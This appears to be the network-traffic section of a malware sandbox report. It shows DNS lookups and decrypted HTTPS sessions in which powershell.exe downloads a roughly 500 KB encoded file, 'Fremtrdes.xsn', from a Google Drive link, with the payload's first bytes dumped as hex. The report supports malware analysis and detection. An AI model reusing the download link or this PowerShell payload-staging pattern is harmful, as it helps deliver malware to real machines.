                                                                                        Mar 12, 2025 19:16:44.021317005 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.021378040 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.022043943 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.022152901 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.022161961 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.022221088 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.023385048 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.023477077 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.023483992 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.023540974 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.023547888 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.023597956 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.024441957 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.024507999 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.025300026 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.025362015 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.025372028 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.025420904 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.025428057 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.025474072 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.027045965 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.027111053 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.027118921 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.027173996 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.027883053 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.027955055 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.027962923 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.028012037 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.028939009 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.028994083 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.029001951 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.029050112 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.029910088 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.029968023 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.029980898 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.030030966 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.030947924 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.031019926 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.031028032 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.031069040 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.031822920 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.031915903 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.031924009 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.032007933 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.032869101 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.032932043 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.032958984 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.032968998 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.032999992 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.033060074 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.033965111 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.034041882 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.034054041 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.034131050 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.035038948 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.035092115 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.035099983 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.035142899 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.036336899 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.036436081 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.036452055 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.036526918 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.037252903 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.037300110 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.037307978 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.037357092 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.038342953 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.038419008 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.038427114 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.038522005 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.039361954 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.039437056 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.039447069 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.039500952 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.040465117 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.040548086 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.040555954 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.040612936 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.041649103 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.041729927 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.041738033 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.041790962 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.042628050 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.042692900 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.042715073 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.042778015 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.042784929 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.042836905 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.043819904 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.043889999 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.043901920 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.043991089 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.044864893 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.044922113 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.045887947 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.045931101 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.045974016 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.045981884 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.046005011 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.046055079 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.046931028 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.046998024 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.047004938 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.047055960 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.047061920 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.047080994 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.047090054 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:44.047127008 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:44.047162056 CET49697443192.168.2.7172.217.18.1

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 12, 2025 19:15:02.832035065 CET6314053192.168.2.71.1.1.1
                                                                                        Mar 12, 2025 19:15:02.841505051 CET53631401.1.1.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:05.843420029 CET6004153192.168.2.71.1.1.1
                                                                                        Mar 12, 2025 19:15:05.850302935 CET53600411.1.1.1192.168.2.7
                                                                                        Mar 12, 2025 19:15:16.101320982 CET6379353192.168.2.71.1.1.1
                                                                                        Mar 12, 2025 19:15:16.108032942 CET53637931.1.1.1192.168.2.7

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Mar 12, 2025 19:15:02.832035065 CET192.168.2.71.1.1.10x4b81Standard query (0)Host_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:05.843420029 CET192.168.2.71.1.1.10x1e61Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:16.101320982 CET192.168.2.71.1.1.10xaf60Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Mar 12, 2025 19:14:47.380250931 CET1.1.1.1192.168.2.70xe435No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:02.841505051 CET1.1.1.1192.168.2.70x4b81Name error (3)Host_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:05.850302935 CET1.1.1.1192.168.2.70x1e61No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:06.297904968 CET1.1.1.1192.168.2.70x2219No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:06.297904968 CET1.1.1.1192.168.2.70x2219No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Mar 12, 2025 19:15:16.108032942 CET1.1.1.1192.168.2.70xaf60No error (0)drive.usercontent.google.com172.217.18.1A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • drive.google.com
                                                                                        • drive.usercontent.google.com

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749683216.58.206.464436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-12 18:15:07 UTC215OUTGET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Host: drive.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2025-03-12 18:15:08 UTC1610INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:08 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'nonce-yxbNBBQthlLQ1olckLvzTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749690216.58.206.464436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-12 18:15:15 UTC97OUTGET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1
                                                                                        Host: drive.google.com
                                                                                        2025-03-12 18:15:16 UTC1319INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XJs7KLvfst9IMyZGASjOQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.749693172.217.18.14436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-12 18:15:18 UTC139OUTGET /download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download HTTP/1.1
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2025-03-12 18:15:21 UTC5009INHTTP/1.1 200 OK
                                                                                        X-GUploader-UploadID: AKDAyIttZZjpnec7Jv0bBUrVV71Yy8SvGhyVdpUik0--fjKTcAHOcKx6kKeosqzortNqwiSP
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="Fremtrdes.xsn"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 501772
                                                                                        Last-Modified: Tue, 11 Mar 2025 07:34:14 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:20 GMT
                                                                                        Expires: Wed, 12 Mar 2025 18:15:20 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=5tNDzA==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2025-03-12 18:15:21 UTC5009INData Raw: 2f 47 61 44 39 67 43 37 65 30 34 64 41 47 62 42 36 67 43 45 79 51 4e 63 4a 41 52 6d 67 66 38 4c 67 49 44 42 41 4c 6c 4c 2b 4a 57 52 5a 69 48 62 67 4d 4d 41 67 66 45 62 31 63 71 53 67 38 63 41 2b 49 48 42 73 4e 4b 67 2f 4d 48 6a 41 4d 48 72 41 47 61 44 7a 67 42 6d 67 38 73 41 75 75 32 48 44 6a 68 6d 77 65 38 41 67 50 6e 55 77 4f 6b 41 2f 44 48 4b 67 4d 73 41 5a 6f 50 76 41 49 6b 55 43 35 44 41 36 41 44 52 34 69 44 53 6d 34 50 42 42 4a 41 67 79 59 48 35 52 5a 54 4c 42 58 7a 5a 67 50 70 67 67 4d 73 41 69 30 51 6b 42 4d 44 67 41 4a 75 4a 77 35 73 45 41 49 48 44 68 45 63 4e 41 34 50 71 41 4e 6e 51 75 76 2b 32 2b 7a 68 6d 67 66 37 52 67 34 44 42 41 49 48 79 38 70 50 31 55 2f 7a 41 34 51 43 42 36 67 30 6c 44 6d 75 46 30 6d 61 44 36 77 43 62 77 65 4d 41 6b 49 54
                                                                                        Data Ascii: /GaD9gC7e04dAGbB6gCEyQNcJARmgf8LgIDBALlL+JWRZiHbgMMAgfEb1cqSg8cA+IHBsNKg/MHjAMHrAGaDzgBmg8sAuu2HDjhmwe8AgPnUwOkA/DHKgMsAZoPvAIkUC5DA6ADR4iDSm4PBBJAgyYH5RZTLBXzZgPpggMsAi0QkBMDgAJuJw5sEAIHDhEcNA4PqANnQuv+2+zhmgf7Rg4DBAIHy8pP1U/zA4QCB6g0lDmuF0maD6wCbweMAkIT
                                                                                        2025-03-12 18:15:21 UTC4678INData Raw: 6c 77 58 65 61 39 6d 48 41 2f 35 37 61 45 6a 51 4f 4c 57 79 43 58 6f 6a 4a 66 38 34 70 51 54 7a 39 6a 4d 52 67 74 46 31 34 66 4e 51 6d 54 77 6a 62 34 39 2b 68 76 6b 6f 75 35 39 4c 74 5a 36 4d 65 38 68 38 77 4b 34 53 34 4e 48 64 42 73 55 5a 4b 34 70 4f 78 62 31 6c 37 5a 70 58 62 4e 62 77 56 65 45 54 55 33 69 53 6c 58 78 71 36 67 57 48 6c 55 36 6b 5a 35 73 57 68 4b 63 74 70 6d 71 6f 43 47 4b 77 6d 4a 65 57 30 42 4f 69 38 47 42 36 32 72 30 64 74 66 74 33 6e 36 47 34 44 66 50 4c 6f 46 41 52 63 42 2b 4d 63 48 64 75 35 67 37 67 77 61 75 63 79 41 58 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 38 36 57 41 72 32 6a 56 50 55 32 64 6f 52 77 47 38 48 57 61 4e 64 78 61 43 70 79 2b 4f 33 79 79 4e 68 31 47 2b 42 35 48 6c 4c 2b
                                                                                        Data Ascii: lwXea9mHA/57aEjQOLWyCXojJf84pQTz9jMRgtF14fNQmTwjb49+hvkou59LtZ6Me8h8wK4S4NHdBsUZK4pOxb1l7ZpXbNbwVeETU3iSlXxq6gWHlU6kZ5sWhKctpmqoCGKwmJeW0BOi8GB62r0dtft3n6G4DfPLoFARcB+McHdu5g7gwaucyAXoXP47aFz+O2hc/jtoXP47aFz+O2hc86WAr2jVPU2doRwG8HWaNdxaCpy+O3yyNh1G+B5HlL+
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 68 72 76 79 72 4d 6b 70 54 32 64 78 4e 49 37 44 33 54 76 54 51 61 47 6f 6f 66 42 6a 37 38 67 34 35 53 2f 6c 47 76 52 6c 55 62 36 6e 46 52 70 35 4c 44 43 62 56 34 61 43 61 79 57 53 68 4b 68 61 30 6c 37 76 33 4d 61 2b 50 68 4a 71 6f 61 49 34 37 46 77 63 79 43 34 78 52 45 42 6a 51 52 79 53 6a 6b 56 6c 59 51 6a 4d 56 57 50 6b 7a 79 4b 42 73 56 30 68 58 75 47 62 79 50 75 70 6e 4e 4b 75 37 53 49 2f 34 37 61 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                        Data Ascii: hrvyrMkpT2dxNI7D3TvTQaGoofBj78g45S/lGvRlUb6nFRp5LDCbV4aCayWShKha0l7v3Ma+PhJqoaI47FwcyC4xREBjQRySjkVlYQjMVWPkzyKBsV0hXuGbyPupnNKu7SI/47aEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 70 48 38 4b 34 35 75 69 4e 4c 57 45 6d 6f 58 4d 2b 6f 74 35 4b 36 68 65 64 6d 46 62 43 2f 7a 4a 50 4c 55 79 66 6b 68 54 4e 73 6f 78 68 76 73 6f 58 4e 78 45 2f 64 38 2b 66 71 78 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4e 5a 51 68 62 38 6e 4d 36 65 64 31 45 75 50 53 49 7a 44 2b 45 30 4f 6f 48 50 34 34 71 46 69 57 65 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 48 39 65 55 49 4d 32 6f 71 79 78 58 47 54 53 37 52 63 58 6a 66 63 66 6a 74 47 7a 44 76 38 78 33 79 4f 74 68 61 73 50 56 73 55 7a 6d 45 4d 59 71 2f 6f 49 49 79 76 53 44 53 76 74 36 45 30 30 4b 50 6a 51 74 45 76 69 47 48 43 70 33 41 39 72 30 79 37 65 41 64 4a 6b 34 68 61 4d 35 4c 33 73 71 54 78 47 78 4e 74 4a 4c 68
                                                                                        Data Ascii: pH8K45uiNLWEmoXM+ot5K6hedmFbC/zJPLUyfkhTNsoxhvsoXNxE/d8+fqxc/jtoXP47aFz+O2hc/jtoXP47aFz+NZQhb8nM6ed1EuPSIzD+E0OoHP44qFiWe2hc/jtoXP47aFz+O2hc/jtoXP47aFH9eUIM2oqyxXGTS7RcXjfcfjtGzDv8x3yOthasPVsUzmEMYq/oIIyvSDSvt6E00KPjQtEviGHCp3A9r0y7eAdJk4haM5L3sqTxGxNtJLh
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 6f 64 4a 58 47 6f 4b 33 78 79 36 58 47 66 6c 50 4e 4c 45 67 57 78 39 68 50 42 31 56 76 6c 41 46 50 2b 6a 77 69 5a 47 52 41 63 76 6c 77 6d 61 47 4b 2b 65 58 4a 54 33 37 66 6f 31 4e 4c 4e 6d 6f 61 39 74 53 6b 62 47 30 74 48 2f 67 6b 72 55 44 47 6d 59 48 49 56 33 5a 47 36 66 56 6c 7a 76 56 34 51 59 55 47 78 66 6b 4a 63 43 6c 57 33 36 59 35 70 54 70 4b 4d 72 54 77 79 75 37 76 71 47 5a 37 46 4b 52 38 64 6c 47 75 64 76 69 30 2b 66 4c 41 59 73 4e 7a 74 65 49 6b 6b 77 59 53 58 72 39 49 56 47 52 43 39 58 6e 34 6e 73 51 49 31 75 50 73 2b 4a 4a 43 4e 31 73 4d 37 74 33 6b 46 47 38 31 31 58 75 63 6c 78 66 30 4b 51 62 65 4c 31 6f 71 59 4a 67 64 47 55 41 68 43 2f 78 56 72 76 5a 54 45 31 36 4d 65 4a 57 6f 73 50 64 6f 41 49 30 48 45 6d 30 6e 44 43 73 72 61 2b 36 4b 74 56
                                                                                        Data Ascii: odJXGoK3xy6XGflPNLEgWx9hPB1VvlAFP+jwiZGRAcvlwmaGK+eXJT37fo1NLNmoa9tSkbG0tH/gkrUDGmYHIV3ZG6fVlzvV4QYUGxfkJcClW36Y5pTpKMrTwyu7vqGZ7FKR8dlGudvi0+fLAYsNzteIkkwYSXr9IVGRC9Xn4nsQI1uPs+JJCN1sM7t3kFG811Xuclxf0KQbeL1oqYJgdGUAhC/xVrvZTE16MeJWosPdoAI0HEm0nDCsra+6KtV
